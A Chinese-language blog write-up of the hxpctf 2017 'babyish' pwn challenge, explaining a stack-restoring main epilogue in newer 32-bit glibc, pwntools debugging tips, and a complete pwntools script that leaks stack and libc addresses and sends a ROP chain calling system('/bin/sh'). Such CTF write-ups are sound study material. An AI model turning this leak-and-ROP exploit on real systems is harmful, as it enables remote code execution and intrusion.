CTFctfCTF Re&&Pwn

hxpctf2017-babyish

2019-10-31  本文已影响0人  v1gor

pwntools使用技巧以及较新版本32位libc下的ROP

hxpctf 2017 pwn100 babyish

题目比较简单,但是学到了几个知识点,记录一下。

简要分析

main.png adjustStack.png

观察main函数发现这个main函数的返回和之前见过的的main函数返回不太一样:

以前见过的返回普遍是直接esp-0x??然后就ret了
这个程序的main函数返回使用栈上存储的数据来调整ret之前的esp的值,也就是说,如果直接ROP,我们的junk数据中必须在ebp-0x0c这个地方布置一个栈地址,这个栈地址必须在我们可覆盖的范围内(也就是大于main函数中buf的地址)。

这样的调整机制在较新的libc中都有(这题的libc版本是2.24),这种机制的好处在于要求攻击者在rop时还泄露一个栈地址,提高了攻击难度。

很巧的是之前泄露libc地址的时候栈中就有一个符合上述条件的栈地址,因此通过在栈上布置好需要的数据,就可以开心的ROP啦。

显示libc信息的技巧

只需要

sudo chmod +x libc.so.6
./libc.so.6

即可。

libc_info.png

pwntools技巧

看了dalao的pwn脚本学到了pwntools的使用姿势:

debugInfo.png

攻击脚本

from pwn import *
import time

#设置pwntools
io = process("./vuln",env={'LD_PRELOAD':'./libc.so.6'})
libc = ELF("./libc.so.6")
context.log_level='debug'
#io =remote('35.198.98.140',45067)

#获取所给libc的符号偏移
setbuffer_symbol = libc.symbols["setbuffer"]
system_symbol = libc.symbols["system"]

#泄露内存中栈地址和libc地址
io.recv()
io.send("1"*16)
io.recvuntil("1"*16)
data = io.recv()[:12]
setbuff_addr = int(data[-4:][::-1].encode("hex"),16) - 0xB
stack_addr = int(data[0:4][::-1].encode("hex"),16)
system_addr =  system_symbol - setbuffer_symbol + setbuff_addr
binsh_symbol = 0x0015CD48
binsh_addr = binsh_symbol - system_symbol + system_addr
print "[+] leaked setbuff addr :" + hex(setbuff_addr)
print "[+] calced system_addr :" +hex(system_addr)
print "[+] leaked stack addr:" + hex(stack_addr)
print "[+] calced binsh addr:" + hex(binsh_addr)

#发送ROP链
sleep(3)
io.sendline("-1")
payload = "j"*0x50 + p32(stack_addr) + 3*"junk"+p32(system_addr) + p32(0x080486EF) + p32(binsh_addr)
pid = proc.pidof(io)[0]
print pid
gdb.attach(io)
io.send(payload)
io.interactive()

注意时延问题。。。直接连远程的是后我是用ipython一行一行运行脚本才拿到的shell,修改sleep的秒数有时候好使。

flag.png
上一篇下一篇

猜你喜欢

热点阅读